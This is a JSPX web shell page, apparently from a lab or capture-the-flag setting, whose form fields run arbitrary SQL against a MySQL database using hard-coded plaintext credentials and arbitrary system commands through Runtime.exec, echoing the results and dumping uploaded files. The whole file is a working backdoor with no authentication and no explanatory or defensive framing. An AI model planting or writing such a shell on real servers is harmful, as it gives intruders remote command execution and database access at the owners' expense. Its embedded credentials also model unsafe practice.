<?xml version="1.0" encoding="UTF-8" ?>
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="2.0">
  <jsp:directive.page contentType="text/html;charset=UTF-8" import="java.io.*,java.sql.*,javax.servlet.*,javax.servlet.http.*,org.springframework.web.multipart.*,java.util.*" />
  <html>
    <body>
      <h2>JSPX MySQL Shell</h2>
      <form method="GET">
        SQL Query: <input type="text" name="sql" size="80"/><br/>
        System Cmd: <input type="text" name="cmd" size="80"/><br/>
        <input type="submit" value="Execute"/>
      </form>

      <jsp:scriptlet>
        <![CDATA[
          out.println("<pre>");

          String query = request.getParameter("sql");
          String cmd = request.getParameter("cmd");

          if (query != null && !query.isEmpty()) {
            Connection conn = null;
            Statement stmt = null;
            try {
              String url = "jdbc:mysql://db-server:3306/net_robotics?useSSL=false&allowPublicKeyRetrieval=true&serverTimezone=Asia/Seoul";
              String user = "whs3";
              String pass = "whs3password123!";
              Class.forName("com.mysql.cj.jdbc.Driver");
              conn = DriverManager.getConnection(url, user, pass);
              stmt = conn.createStatement();
              boolean hasResult = stmt.execute(query);
              if (hasResult) {
                ResultSet rs = stmt.getResultSet();
                ResultSetMetaData meta = rs.getMetaData();
                int cols = meta.getColumnCount();
                while (rs.next()) {
                  for (int i = 1; i <= cols; i++) {
                    out.print(meta.getColumnLabel(i) + ": " + rs.getString(i) + "\t");
                  }
                  out.println();
                }
                rs.close();
              } else {
                out.println("Update Count: " + stmt.getUpdateCount());
              }
            } catch (Exception e) {
              e.printStackTrace(new java.io.PrintWriter(out));
            } finally {
              if (stmt != null) try { stmt.close(); } catch (SQLException e) {}
              if (conn != null) try { conn.close(); } catch (SQLException e) {}
            }
          }

          if (cmd != null && !cmd.isEmpty()) {
            try {
              Process p = Runtime.getRuntime().exec(cmd);
              BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
              String line;
              while ((line = reader.readLine()) != null) {
                out.println(line);
              }
              reader.close();
            } catch (Exception e) {
              e.printStackTrace(new java.io.PrintWriter(out));
            }
          }

          // multipart/form-data 확인 및 내용 출력
          if (request instanceof MultipartHttpServletRequest) {
            MultipartHttpServletRequest multi = (MultipartHttpServletRequest) request;
            out.println("\n--- Multipart Text Fields ---");
            Map<String, String[]> params = multi.getParameterMap();
            for (Map.Entry<String, String[]> entry : params.entrySet()) {
              out.print(entry.getKey() + " = ");
              for (String val : entry.getValue()) {
                out.print(val + " ");
              }
              out.println();
            }

            out.println("\n--- Multipart File Fields ---");
            Map<String, MultipartFile> fileMap = multi.getFileMap();
            for (Map.Entry<String, MultipartFile> entry : fileMap.entrySet()) {
              MultipartFile file = entry.getValue();
              out.println("Field: " + entry.getKey());
              out.println("  Filename: " + file.getOriginalFilename());
              out.println("  Size: " + file.getSize());
              out.println("  Content-Type: " + file.getContentType());
              out.println("  First 100 bytes: ");
              try {
                InputStream is = file.getInputStream();
                for (int i = 0; i < 100; i++) {
                  int b = is.read();
                  if (b == -1) break;
                  out.print(String.format("%02x ", b));
                }
                is.close();
                out.println();
              } catch (Exception e) {
                e.printStackTrace(new java.io.PrintWriter(out));
              }
            }
          } else {
            out.println("\n[!] Not a MultipartHttpServletRequest.");
          }

          out.println("</pre>");
        ]]>
      </jsp:scriptlet>
    </body>
  </html>
</jsp:root>
